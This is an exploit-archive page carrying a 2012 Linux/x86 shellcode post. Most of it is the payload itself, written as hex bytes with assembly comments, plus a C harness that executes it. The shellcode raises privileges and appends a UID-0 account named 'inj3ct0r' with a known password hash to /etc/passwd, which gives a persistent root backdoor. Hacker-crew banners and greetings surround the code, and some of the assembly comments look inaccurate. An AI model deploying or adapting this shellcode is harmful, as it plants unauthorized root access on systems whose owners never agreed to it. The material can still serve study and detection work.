what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 Add New User/Password Shellcode

Linux/x86 Add New User/Password Shellcode
Posted Jan 25, 2012
Authored by KedAns-Dz

180 bytes small Linux/x86 add new user/password shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | 2507665fb5598085aa7170024022a8af2b3c254563abca1ee43b028cda2e1de8
Download | Favorite | View

Linux/x86 Add New User/Password Shellcode

Change Mirror Download
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

/*
###
# Title : linux/x86 Add new User/Passwd - suid(0) - shellcode 180 bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns 
# platform : linux/x86
# Type : shellcode / local exploit
# Size : 180 bytes
# Inf0 : Add neW User w!th passwd as r00t suid(0) .
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
# | ------------------------------------------------- < |
###

*/


// User = Inj3ct0r
// Pass = r00t

#include <stdio.h>

char newuser[] =
   /* setreuid(0,0) */
   
   "\x31\xc9"   // xor %ecx,%ecx
   "\x31\xdb"   // xor %ebx,%ebx
   "\xf7\xe3"   // mul %ebx
   "\xb0\xa4"   // mov %al,$0xa4
   "\xcd\x80"   // int $0x80
   "\x31\xc9"   // xor %ecx,%ecx
   "\x31\xdb"   // xor %ebx,%ebx
   
   /* e0f */

   "\x6a\x46"   // push $0x46
   "\x58"       // pop %eax
   "\xcd\x80"   // int $0x80
   "\x31\xdb"   // xor %ebx,%ebx
   "\x6a\x17"   // push $0x17
   "\x58"       // pop %eax 
   "\xcd\x80"   // int $0x80
   "\x31\xc9"   // xor %ecx,%ecx
   "\x31\xdb"   // xor %ebx,%ebx
   "\x6a\x46"   // push $0x46
   "\x58"       // pop %eax 
   "\xcd\x80"   // int $0x80
   "\x6a\x3d"   // push $0x3d
   "\x89\xe3"   // mov %ebx,%esp
   "\x6a\x27"   // push $0x27
   "\x58"       // pop %eax
   "\xcd\x80"   // int $0x80
   "\x89\xd9"   // mov %ecx,%ebx
   "\x58"       // pop %eax
   "\xcd\x80"   // int $0x80
   "\x31\xc0"   // xor %eax,%eax
   "\x50"       // push %eax
   "\x66\x68\x2e\x2e"   // push $0x2e2e
   "\x89\xe3"   // mov %ebx,%esp
   "\x6a\x3d"   // push $0x3d
   "\x59"       // pop %ecx 
   "\xb0\x0c"   // mov %al,$0x0c
   "\xcd\x80"   // int $0x80
   "\xe2\xfa"   // loopd short
   "\x6a\x3d"   // push %0x3d
   "\x89\xd9"   // mov %ecx,%ebx
   "\x58"       // pop %eax
   "\xcd\x80"   // int $0x80
   "\x31\xc9"   // xor %ecx,%ecx
   "\x89\xcb"   // mov %ebx,%ecx
   "\x6a\x46"   // push $0x46
   "\x58"       // pop %eax
   "\xcd\x80"   // int $0x80
   "\x6a\x05"   // push $0x05
   "\x58"       // pop %eax 
   "\x31\xc9"   // xor %ecx,%ecx
   "\x51"       // push %ecx
   "\x68\x73\x73\x77\x64"  // push $0x64777373
   "\x68\x2f\x2f\x70\x61"  // push $0x61702f2f
   "\x68\x2f\x65\x74\x63"  // push $0x6374652f
   "\x89\xe3"   // mov %ebx,%esp
   "\x41"       // inc %ecx
   "\xb5\x04"   // mov %ch,$0x04
   "\xcd\x80"   // int %80
   "\x93"       // xchg %eax,%ebx
   "\xe8\x26\x00\x00\x00"  // call .me
   
   // Add User/Passwd + USR.Shell=/bin/sh
   
   /* inj3ct0r:AzXA.7JfdpHtA:0:0::/:/bin/sh */
   
   "\x69\x6e\x6a\x33\x63\x74"
   "\x72\x3a\x41\x7a\x58\x41"
   "\x2e\x37\x4a\x66\x64\x70"
   "\x48\x74\x41\x3a\x30\x3a"
   "\x30\x3a\x3a\x2f\x3a\x2f"
   "\x62\x69\x6e\x2f\x73\x68"
   
   /* e0f */
   
   "\x0a\x59\x8b" // or %bl,%ecx
   "\x51"       // push %ecx
   "\xfc"       // cld
   "\x6a\x04"   // push $0x04
   "\x58"       // pop %eax
   "\xcd\x80"   // int $0x80
   "\x6a\x01"   // push $0x01
   "\x58"       // pop %eax
   "\xcd\x80";   // int $0x80

int main()
{  
  printf("%d\n", strlen(newuser));
  (*(void (*)()) newuser)();
  return 0;
}

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy 
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close